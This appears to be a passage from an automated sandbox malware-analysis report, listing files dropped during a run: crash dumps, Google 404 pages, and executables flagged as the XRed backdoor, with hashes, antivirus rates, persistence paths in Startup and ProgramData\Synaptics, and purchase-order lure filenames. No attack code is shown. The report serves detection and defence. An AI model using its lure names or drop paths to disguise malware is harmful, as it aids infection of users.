                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.3.2.<./.P.i.
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4590
                                                                                                                                                                          Entropy (8bit):4.463134283916425
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsBJg77aI9s/WpW8VYEYm8M4JFJF4+q8nLc5ZN9d:uIjfTI7iu7V8Ju2mZN9d
                                                                                                                                                                          MD5:79343E6DE47CCC17A871252A4A4AED18
                                                                                                                                                                          SHA1:A2597B8A513BC496032AB1B01BC88BC38E582BD4
                                                                                                                                                                          SHA-256:5B39500C363E528DAA6995C9F14BD00CED949D77445012227A2D2F737250B2AA
                                                                                                                                                                          SHA-512:0F47A8D2147AA2C6476979CDE27C7AC565D8297E29476ABC52102B2DCB31844970AD7D652960E95491DB243633FE02F70D9DAC514F63278301B401ACC572CC2E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653872" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:48:59 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2353774
                                                                                                                                                                          Entropy (8bit):1.4956717323563022
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:yLzF7kEr55bikYG5Y0ynaXqxZxWp4k+uZWm3BjmzR:ynF/GkY2Y0wa6op4Tm3hmzR
                                                                                                                                                                          MD5:DCC44E89C6C9654EF40C09660D7C4D3C
                                                                                                                                                                          SHA1:EAD7EE7C184FD94DC9A267E9C31D9B209C7446D5
                                                                                                                                                                          SHA-256:F3071BD5DCA5E77CB6A811B14577CF474D47A5B7FBA241ECB35E358F484206A6
                                                                                                                                                                          SHA-512:EB65C20E9B6BACE33205C3C100751E0272C31A9B9203100E2EA50B3D52AF8E5DE0A867426AD27EDB967E59C698393A15C0385D8B1802F5A7AEC7C132E7825A55
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6310
                                                                                                                                                                          Entropy (8bit):3.7133705497783254
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJhxY69GtMPgYirJkJPmYpDr89bmpsfTbim:R6lXJI6MMIYGJkJPgmCfT/
                                                                                                                                                                          MD5:8111B748A116203A2A366A09B38F3041
                                                                                                                                                                          SHA1:0390B4181DA315B2F7FFBB02349C60FAB3ED98AF
                                                                                                                                                                          SHA-256:19121C9953C1AE76E443D54BCA6D1910A596E35D1D723E4004EE1200AD1C54C5
                                                                                                                                                                          SHA-512:29239831C26E070BA15A86DF15E2A318011CF1E28240917D4EE9900CD5CD1AC56700B0ADD002745BD13F3415BB6B2CF9D9082DA4D5213C32407ED1F581A52B22
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.6.0.<./.P.i.
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4580
                                                                                                                                                                          Entropy (8bit):4.440706577788967
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI9s/WpW8VYgYm8M4JFFF9RP+q8ZDJc5Zfd:uIjfWI7iu7VAJVPyJmZfd
                                                                                                                                                                          MD5:2E6CA2ECD5966C9DD5020FB18B4C6216
                                                                                                                                                                          SHA1:DD45A0E9896F293C7C287E413C68A8D3492DF84E
                                                                                                                                                                          SHA-256:88E20995AB6189F939804CD90A1AEA1FFFBD0D6F15A8D3A2DCB67D5E329949BE
                                                                                                                                                                          SHA-512:B291FC68DE3151B31CF70BA8FFF472876B5B02F73175EC5B6B3A40AD8E0CC09FC389366586332D9A6167744C2F7EC9974B92070A43518C5179B767CEA52657D6
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653871" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, CheckSum 0x00000004, Mon Dec 30 10:49:07 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65040
                                                                                                                                                                          Entropy (8bit):2.604396750002626
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:9W9mn67HV/3vCY8cUsDJVxkgLClHDy5KiqNAH3/3zqr:9W9kw1vvC0xkZlAKiqN6/u
                                                                                                                                                                          MD5:B04927CD7D402EC1DDBDC4788F3AACFE
                                                                                                                                                                          SHA1:19635CE322EBB0A49FA5BDAC10B7702F1778E134
                                                                                                                                                                          SHA-256:D5C5F0BB7E1CD63AC256337F407D4685F1B51AD55D0279FA357C4F0517884D83
                                                                                                                                                                          SHA-512:F70D4B2C50074913FD0103A7B0213CBB83B4F7A4D27811868DD67B2AF15A7EEEC5AC990A6287FC7E4AD1C496726B7DF3C35929FA91D21A6E67118E094A5775EE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6310
                                                                                                                                                                          Entropy (8bit):3.6921036236609632
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJhxp6DPHeYirJk7YpDZ89bxbZsfhLjm:R6lXJZ6iYGJkPxbyft6
                                                                                                                                                                          MD5:A8C7FE001F67A37AC246D0BFD4C95169
                                                                                                                                                                          SHA1:3B1529D11A99B78008008E56DFEC175AA17C81BC
                                                                                                                                                                          SHA-256:E8918257D79295F4F78D738505BCCEFB35130B0059E813CD899F076B56BD1481
                                                                                                                                                                          SHA-512:CE6A151B97C2C59EC1768C98052F25781CA6404A3178D667A58C25BF294DE9C4C107321E9EF20CE874CFA21565D11318C3666CBF4D50F510CEC30F1AD3852044
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.6.0.<./.P.i.
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4580
                                                                                                                                                                          Entropy (8bit):4.4417188413069315
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI9s/WpW8VY8zYm8M4JFFFaE+q8ZDJc5Zfd:uIjfWI7iu7VZmJwEyJmZfd
                                                                                                                                                                          MD5:DE5371F67D7F841D8742F1ED4D9C2536
                                                                                                                                                                          SHA1:BCE6E11A7BE6D3BE1A741F3CE5FED968824AFFD7
                                                                                                                                                                          SHA-256:DEEDB218A20A45CF3D68482152A1BAA6F7869E4131CBC8F07A4C8EA3074C47A9
                                                                                                                                                                          SHA-512:60DA916C86B63C4DEA2E3B402AE1F78320F37C8590CD828524A2D28B086D7AF3B9E996C571A3926E5BA9AF89476CADF37FC41D597FEF895CD57F667A4B8D739D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653871" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                          Entropy (8bit):6.638013190381294
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                          MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                          SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                          SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                          SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX4FAD.tmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX4FAD.tmp, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: valyzt.msi, Detection: malicious
                                                                                                                                                                          • Filename: New PO - Supplier 16-12-2024-Pdf.exe, Detection: malicious
                                                                                                                                                                          • Filename: Purchase-Order.exe, Detection: malicious
                                                                                                                                                                          • Filename: hoaiuy.msi, Detection: malicious
                                                                                                                                                                          • Filename: 222.msi, Detection: malicious
                                                                                                                                                                          • Filename: Machine-PO.exe, Detection: malicious
                                                                                                                                                                          • Filename: 222.exe, Detection: malicious
                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2208256
                                                                                                                                                                          Entropy (8bit):7.058935933771513
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
                                                                                                                                                                          MD5:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                          SHA1:CB330A1AD78387BDC401142FEECAC763AC63D3D9
                                                                                                                                                                          SHA-256:E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
                                                                                                                                                                          SHA-512:62D55F02D14D122B10A0EF08DFA5FFA950F4153863246E3F6E6A6BD1A4D1C63321C7C4E9FB4306C0535E73389D764CC0646C0821A62FD50A2896EC49F205490B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: Machine-PO.exe, Detection: malicious
                                                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2208256
                                                                                                                                                                          Entropy (8bit):7.058935933771513
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
                                                                                                                                                                          MD5:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                          SHA1:CB330A1AD78387BDC401142FEECAC763AC63D3D9
                                                                                                                                                                          SHA-256:E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
                                                                                                                                                                          SHA-512:62D55F02D14D122B10A0EF08DFA5FFA950F4153863246E3F6E6A6BD1A4D1C63321C7C4E9FB4306C0535E73389D764CC0646C0821A62FD50A2896EC49F205490B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1436672
                                                                                                                                                                          Entropy (8bit):7.208680290347871
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                                                                                          MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                          SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                                                                                          SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                                                                                          SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.263372021919899
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+00IbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ab+pAZewRDK4mW
                                                                                                                                                                          MD5:470427D55FF6FF03F5B49D5BF7E181F2
                                                                                                                                                                          SHA1:434562D73E08FC0B4F6B40CCBA30A10C819A931F
                                                                                                                                                                          SHA-256:FEF4EA1C9CAEBA8FB02AC25426AEC00D018FA1BF6F53792EFF4C497FA4E40A9F
                                                                                                                                                                          SHA-512:A33ACF9B8D1E2D47DEFAA4BC0BB72C992E67DA9E25482D5655D2CD221E47043F8FF6D7D73EABC851BE6EC7C5F9F2D444D37BA9D966216CB7F12AEBADDEF12F66
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zChFu6ksVeIeijU-8HsB8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.272866444627129
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+041bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v5+pAZewRDK4mW
                                                                                                                                                                          MD5:94809179AADD791CB6DEA430E9D16E20
                                                                                                                                                                          SHA1:20CEB151C5D8407CA38E1FFB2AFF4097705822DF
                                                                                                                                                                          SHA-256:C12441F0D27E25EE29D3BCB64DD460EAFBEC39F68BCC5CBEBB9493EF9E83FC51
                                                                                                                                                                          SHA-512:FE004B8EE8A308312A945DC908AD2EFA05715B6F5A2A767675C297F4C8C7E6415DD0D532E4FB6378B8E6E781904793E73EC3662465E51123EF9E3AB318B9DDFB
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.258096474517234
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0rk0SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6k0+pAZewRDK4mW
                                                                                                                                                                          MD5:87126EC1C6797A18C71E558BC2FE2105
                                                                                                                                                                          SHA1:5452A4C08467AF718C4F5242CD32D02FEAA6124B
                                                                                                                                                                          SHA-256:101B08E5CEDEBAFCA7F19592812798A85501043DF2D050C22820E55007B8DF5C
                                                                                                                                                                          SHA-512:94D55CE63852B060BCA2FEAE26265D87A9942C6A13B32ABB84C287E730D499DA45166102E278414DA6D31D0B18D41C9A65645F1008E35B75F05A48229E8A6DFC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.270678240340653
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                                                                          MD5:3FA1EA0F30A169B630375398DD3F220D
                                                                                                                                                                          SHA1:08E7911314532D30CEADCE6797969010F980B884
                                                                                                                                                                          SHA-256:C38E2FA4C24E300B5A0872831F973F5603BB6F74B2346857FE1F96F7A22787A6
                                                                                                                                                                          SHA-512:111F7485E93D26B3BE02B8544C9B6B9AE1BE7561E237875204614901E0B8CAF0F8E62CB7C057332A516E0208845697B21D087193FB96D9AAE987316021118D5A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2544759443642155
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0qfQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F4+pAZewRDK4mW
                                                                                                                                                                          MD5:AF0BA5CDFCE87834D14285158D81753A
                                                                                                                                                                          SHA1:3B582215A68BDC903B056DDCCC86556DF937DEA6
                                                                                                                                                                          SHA-256:81FEF9477A7DE24DA3838EE619AEA36B092999148A71EE73DBBD27380A692069
                                                                                                                                                                          SHA-512:F8EFF7A4C750D46FEADD2E0E125576B5038771BFE98767086B2D5130A00258357A8B2ED20C91DF633196700D9071337C6FA3E2D694236B17D411F072AEF057D2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
